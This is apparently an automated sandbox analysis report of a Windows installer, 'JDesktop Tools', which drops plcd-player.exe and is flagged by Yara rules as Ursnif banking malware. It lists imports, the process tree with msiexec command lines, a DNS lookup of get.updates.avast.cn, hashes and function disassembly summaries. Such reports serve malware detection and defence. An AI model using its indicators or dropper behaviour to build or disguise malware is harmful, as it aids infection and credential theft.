RT_STRING	0x2232c0	0x568	data	English	United States
RT_STRING	0x223828	0x164	data	English	United States
RT_STRING	0x22398c	0x520	data	English	United States
RT_STRING	0x223eac	0x1a0	data	English	United States
RT_STRING	0x22404c	0x18a	data	English	United States
RT_STRING	0x2241d8	0x216	data	English	United States
RT_STRING	0x2243f0	0x624	data	English	United States
RT_STRING	0x224a14	0x660	data	English	United States
RT_STRING	0x225074	0x2a8	data	English	United States
RT_GROUP_ICON	0x22531c	0x84	data	English	United States
RT_VERSION	0x2253a0	0x384	data	English	United States
RT_MANIFEST	0x225724	0x77b	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

CreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, RemoveDirectoryW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, MoveFileW, GetLastError, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, SetEvent, InitializeCriticalSection, lstrcpynW, WaitForSingleObject, CreateThread, GetProcAddress, LoadLibraryExW, DecodePointer, Sleep, GetDiskFreeSpaceExW, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, GetModuleHandleW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SystemTimeToFileTime, MultiByteToWideChar, WideCharToMultiByte, GetCurrentProcess, GetSystemInfo, WaitForMultipleObjects, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetEnvironmentStringsW, FormatMessageW, LocalFree, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, CreateProcessW, GetExitCodeProcess, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetLocaleInfoW, GetSystemDefaultLangID, GetUserDefaultLangID, GetWindowsDirectoryW, GetSystemTime, GetDateFormatW, GetTimeFormatW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, GetLocalTime, CreateNamedPipeW, ConnectNamedPipe, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, TerminateThread, LocalAlloc, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, IsDebuggerPresent, EncodePointer, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, QueryPerformanceCounter, QueryPerformanceFrequency, LCMapStringEx, GetSystemTimeAsFileTime, CompareStringEx, GetCPInfo, WaitForSingleObjectEx, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetFileType, GetTimeZoneInformation, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetConsoleMode, IsValidCodePage, GetACP, GetOEMCP, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2021 JDesktop Integration Components (JDIC) Project
InternalName	plcd-player
FileVersion	3.4.0.2
CompanyName	JDesktop Integration Components (JDIC) Project
ProductName	JDesktop Tools
ProductVersion	3.4.0.2
FileDescription	JDesktop Tools Installer
OriginalFileName	plcd-player.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2021 11:41:38.929428101 CEST	53700	53	192.168.2.4	8.8.8.8
Oct 25, 2021 11:41:38.952285051 CEST	53	53700	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 25, 2021 11:41:38.929428101 CEST	192.168.2.4	8.8.8.8	0xcbf4	Standard query (0)	get.updates.avast.cn	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 25, 2021 11:41:38.952285051 CEST	8.8.8.8	192.168.2.4	0xcbf4	Name error (3)	get.updates.avast.cn	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: o4c8AUtX1g.exe PID: 3408 Parent PID: 6804

General

Start time:	11:40:42
Start date:	25/10/2021
Path:	C:\Users\user\Desktop\o4c8AUtX1g.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\o4c8AUtX1g.exe'
Imagebase:	0x1290000
File size:	7840232 bytes
MD5 hash:	C7DB399951B19EA446599DC3800A3111
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: msiexec.exe PID: 5776 Parent PID: 568

General

Start time:	11:40:46
Start date:	25/10/2021
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff777c90000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 768 Parent PID: 5776

General

Start time:	11:40:47
Start date:	25/10/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding D90C408BAA115D1625882500CC5A128E C
Imagebase:	0x290000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 5944 Parent PID: 3408

General

Start time:	11:40:48
Start date:	25/10/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\msiexec.exe' /i 'C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi' AI_SETUPEXEPATH=C:\Users\user\Desktop\o4c8AUtX1g.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE='/exenoupdates /forcecleanup /wintime 1635154532 ' AI_EUIMSI=''
Imagebase:	0x290000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 6328 Parent PID: 5776

General

Start time:	11:40:51
Start date:	25/10/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 97E0B76AE09D0E82CE071E7BABCE98E1
Imagebase:	0x290000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: plcd-player.exe PID: 4744 Parent PID: 5776

General

Start time:	11:41:08
Start date:	25/10/2021
Path:	C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe
Imagebase:	0xa70000
File size:	3768184 bytes
MD5 hash:	25DDBD309BB8094229704383977C7268
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.913796145.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.913762032.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000002.937676135.0000000003949000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.913941910.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000002.937726154.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.913912827.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.914001553.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.913978289.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.913841738.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.913966024.0000000003E68000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: o4c8AUtX1g.exe PID: 3408 Parent PID: 6804 o4c8AUtX1g.exeCOMMON

Executed Functions

Function 01352DA0, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01352EA8
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 01352EB5
GetLastError.KERNEL32 ref: 01352EBF
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 01352EE9
GetLastError.KERNEL32 ref: 01352EEF
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,?,?,?), ref: 01352F15
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01352F48
EqualSid.ADVAPI32(00000000,?), ref: 01352F57
FreeSid.ADVAPI32(?), ref: 01352F66
GetLastError.KERNEL32 ref: 01352F6E
FindCloseChangeNotification.KERNEL32(00000000), ref: 01352FA0

Strings

bin, xrefs: 01352E1C

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastToken$InformationProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
String ID: bin
API String ID: 3317745688-2854705901
Opcode ID: 6d95362386a10eed7345ae5e9092ed44be3a444cba4db2edacd27de0965b64a9
Instruction ID: f5cf0803a29c9ca98ce18f423dd563dab3524eb5ca3d612365530514c6225949
Opcode Fuzzy Hash: 6d95362386a10eed7345ae5e9092ed44be3a444cba4db2edacd27de0965b64a9
Instruction Fuzzy Hash: 5F516D71A00219DFDF25DFA8D848FEEBBB8FF08B14F104519E911A7290D775AA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 012A8740, Relevance: 20.1, APIs: 8, Strings: 3, Instructions: 877fileCOMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000), ref: 012A884F
PathIsUNCW.SHLWAPI(00000001,*.*), ref: 012A88B3
FindFirstFileW.KERNEL32(00000001,?,*.*), ref: 012A8AFC
GetFullPathNameW.KERNEL32(00000001,00000000,00000000,00000000), ref: 012A8B16
GetFullPathNameW.KERNEL32(00000001,00000000,00000000,00000000), ref: 012A8B4A
FindClose.KERNEL32(00000000), ref: 012A8BBB
SetLastError.KERNEL32(0000007B), ref: 012A8BC5
PathIsUNCW.SHLWAPI(?,?,2F685009,?,00000000), ref: 012A8DFE

Strings

\\?\UNC\, xrefs: 012A88D3, 012A89EF, 012A8E1E, 012A8F2A
*.*, xrefs: 012A887A, 012A8884
\\?\, xrefs: 012A8A0A, 012A8AC0, 012A8F45, 012A8FF9

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Find$CloseFullName$ErrorFileFirstLast
String ID: *.*$\\?\$\\?\UNC\
API String ID: 2310598285-1700010636
Opcode ID: 03b169fe16798163949d72b28738d593608ce1d1a79f32489229c19346784a9a
Instruction ID: 9da5680e2a5e5f67336addad4a829fedfda95545efd6c28c97609d8298eabbde
Opcode Fuzzy Hash: 03b169fe16798163949d72b28738d593608ce1d1a79f32489229c19346784a9a
Instruction Fuzzy Hash: 0F620571A10606DFDB14DF6CC848B6EFBB5FF54315F548268EA15DB291EB70A900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01363D80, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,?,01345ECB,?,?,?,?,?), ref: 01363D95

Strings

GetTotalFilesSize, xrefs: 01363DD5
ExtractAllFiles, xrefs: 01363DE7
EndExtraction, xrefs: 01363DF9
InitExtraction, xrefs: 01363DCD

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: EndExtraction$ExtractAllFiles$GetTotalFilesSize$InitExtraction
API String ID: 1029625771-3462492388
Opcode ID: 7ef572c7c2caacb0d1c52d6736d5304ea5da4ccf8e6380b39f6d57305b216f8e
Instruction ID: 55781a33a5a4ea8f56551dce783f4acdf35505c41f111263f21d37e9872809d2
Opcode Fuzzy Hash: 7ef572c7c2caacb0d1c52d6736d5304ea5da4ccf8e6380b39f6d57305b216f8e
Instruction Fuzzy Hash: C6017CB5900212EFCB309F65FA489A53FE1F75D316742486BF61587338C6309840DF90

Uniqueness

Uniqueness Score: -1.00%

Function 01345B80, Relevance: 15.7, APIs: 10, Instructions: 749COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$HeapProcess
String ID:
API String ID: 275895251-0
Opcode ID: fea1bc9d651276c2d6ffda122ef284032df9b2f6f196b49084d35767f721502a
Instruction ID: 3ef081be77e0d6fbc05a5c4005662d9507dff668e653cf3265400f46659ae6ae
Opcode Fuzzy Hash: fea1bc9d651276c2d6ffda122ef284032df9b2f6f196b49084d35767f721502a
Instruction Fuzzy Hash: E162A1B0A0124ADFEB14CFACC984B9DFBF5BF45318F1482A9D415AB291DB70A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01342910, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 1009fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,00000003,2F685009,00000000,?,00000000), ref: 01342ADE
FindClose.KERNEL32(00000000,?,00000000), ref: 01342B29

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

Strings

instname-template.msi, xrefs: 0134375B, 0134376D, 01343777
.msi, xrefs: 01342FB4, 01342FC6, 01342FCE

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: FindInit_thread_footer$CloseFileFirstHeapProcess
String ID: .msi$instname-template.msi
API String ID: 9486106-470451314
Opcode ID: cf909ff32ac95be1957c6e3c59dd372fe8dc09df9cc9b2f8d1e2f7c7cde79bc0
Instruction ID: d4228fba22e6a675061cf2a3f643636c4333275e0c6e700e38ba28c192fc0722
Opcode Fuzzy Hash: cf909ff32ac95be1957c6e3c59dd372fe8dc09df9cc9b2f8d1e2f7c7cde79bc0
Instruction Fuzzy Hash: 6982E271A0060ADFDB15DF6CC844BAEBBF5FF54328F108659E925AB290DB74B904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0135FEF0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

Strings

Ph/, xrefs: 0135FFAC, 0135FFBE
Ph/, xrefs: 0135FFD7

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$HeapProcess
String ID: Ph/$Ph/
API String ID: 275895251-1915736154
Opcode ID: 092442bad31a8091cc7c5847361c90ce3bb1872e28102f5a1646f2061b4866e2
Instruction ID: 42bc98cec9f2413331cf24d509292c08a5749dd36c804115793e3de9f7d16109
Opcode Fuzzy Hash: 092442bad31a8091cc7c5847361c90ce3bb1872e28102f5a1646f2061b4866e2
Instruction Fuzzy Hash: 44411571944745AFEB21CF18CC01B9ABBE8EF05724F10866EF9699B7D0D771A904CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01350E70, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 01350F4A

Strings

\, xrefs: 01350EEE
\, xrefs: 01350EC4
\, xrefs: 01350ECC

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: DiskFreeSpace
String ID: \$\$\
API String ID: 1705453755-3791832595
Opcode ID: 6adf73f506cd4fd773c35b11eb903139cb0cd7770d9aad4554515eb4e950055a
Instruction ID: a0719785fd10012d52e91d97ff80378a84591b2868679c3b4432d542fa1f611b
Opcode Fuzzy Hash: 6adf73f506cd4fd773c35b11eb903139cb0cd7770d9aad4554515eb4e950055a
Instruction Fuzzy Hash: 3E41D36291035586CB74DF28C440EABB7E4FF84B58F154A1EFDC8A7540F732898983C6

Uniqueness

Uniqueness Score: -1.00%

Function 013446B0, Relevance: 4.8, APIs: 3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84c77e612241ed5470e18fc3c1165db2f40349305e5a288ae4025e44393987a
Instruction ID: d62c57d82b6ba2b1cd8a7079dfbdefdefe62b5ba2426ac185196885c50b34a6a
Opcode Fuzzy Hash: f84c77e612241ed5470e18fc3c1165db2f40349305e5a288ae4025e44393987a
Instruction Fuzzy Hash: AA919D71D00649AFDB15DFA8C844BADBBF4FF45324F10426EE925EB290EB75A904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013294D0, Relevance: 4.6, APIs: 3, Instructions: 92fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?), ref: 0132956F
FindClose.KERNEL32(00000000), ref: 013295CE

Part of subcall function 01298440: HeapAlloc.KERNEL32(?,00000000,?,2F685009,00000000,013DBBA0,000000FF,?,?,01471B74,?,0135FF88,80004005,2F685009), ref: 0129848A

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$AllocCloseFileFirstHeap
String ID:
API String ID: 2507753907-0
Opcode ID: 6411ac32b6bbc14b6f33d80813fcc51025ce0aa982c10016c34bd4a04377f83c
Instruction ID: f84aabbfd271b50c7c8ea1dddb476f4f9333c95403e9d95a37c0cce988648d95
Opcode Fuzzy Hash: 6411ac32b6bbc14b6f33d80813fcc51025ce0aa982c10016c34bd4a04377f83c
Instruction Fuzzy Hash: 9C31AF70A05238DFDB34EF58C888BAABBB4FF4572CF20415ADA1A97790D7315944CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013CB05F, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,013CB05E,?,?,?,?,?,013C0915), ref: 013CB081
TerminateProcess.KERNEL32(00000000,?,013CB05E,?,?,?,?,?,013C0915), ref: 013CB088
ExitProcess.KERNEL32 ref: 013CB09A

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5cab68cce2f0ed73ebc5930f476b62ec33fba0d37c836999bf0bfd30b61b3ba5
Instruction ID: 1e0f5057be1b79c3032adc203d9e3f16646b50d1ded30f0e9ce72e8def72dee3
Opcode Fuzzy Hash: 5cab68cce2f0ed73ebc5930f476b62ec33fba0d37c836999bf0bfd30b61b3ba5
Instruction Fuzzy Hash: 99E0EC32040558EFCF326F68D94E99C7FB9EB95685B104418F9158E139CBB6ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01346A30, Relevance: 3.4, APIs: 2, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$HeapProcess
String ID:
API String ID: 275895251-0
Opcode ID: 08b1a4b4e643cd4f0c6d9ab4f6423cc75b9d15044e7c37ce63a10556d60655b7
Instruction ID: a4c8444d5d6aa27c1e1bb3cec78383d2f2c6c3152cff5231840daf56cf3521de
Opcode Fuzzy Hash: 08b1a4b4e643cd4f0c6d9ab4f6423cc75b9d15044e7c37ce63a10556d60655b7
Instruction Fuzzy Hash: 73E1BF70A0060ADFDF20CFACC984BAEBBF4FF55318F148169E519AB291D774A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013BB9A6, Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 013BC683

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ed17fbc4b10fc7ba0241e94130566e357ffd8f44db326b3d3fcf3cc3d2fd177b
Instruction ID: 1ce32dd85f6dceebf12dfa72038e87be1ef97dcc1f75fa4d4b1ee2d436a5a234
Opcode Fuzzy Hash: ed17fbc4b10fc7ba0241e94130566e357ffd8f44db326b3d3fcf3cc3d2fd177b
Instruction Fuzzy Hash: 74518CB1A1060ACFEB35CF69D8C17A9BBF4FB44368F14812ADA05EBA54E7749901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0135F4E0, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 247registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 0135F54E
RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 0135F595
RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 0135F5B4
RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 0135F5E3
RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 0135F658
RegQueryValueExW.ADVAPI32(00000000,BuildBranch,00000000,00000000,?,?), ref: 0135F6C1
RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 0135F724
RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 0135F776
GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 0135F813
GetProcAddress.KERNEL32(00000000), ref: 0135F81A
__Init_thread_footer.LIBCMT ref: 0135F82E
GetCurrentProcess.KERNEL32(?), ref: 0135F851
IsWow64Process.KERNEL32(00000000), ref: 0135F858
RegCloseKey.ADVAPI32(00000000), ref: 0135F892

Strings

CurrentBuildNumber, xrefs: 0135F64D
CurrentVersion, xrefs: 0135F5D8
rs_prerelease, xrefs: 0135F6E1
BuildBranch, xrefs: 0135F6B6
co_release, xrefs: 0135F6C9
CurrentMajorVersionNumber, xrefs: 0135F58A
IsWow64Process, xrefs: 0135F809
ReleaseId, xrefs: 0135F719
CurrentMinorVersionNumber, xrefs: 0135F5A9
CSDVersion, xrefs: 0135F76B
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 0135F544
kernel32, xrefs: 0135F80E

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

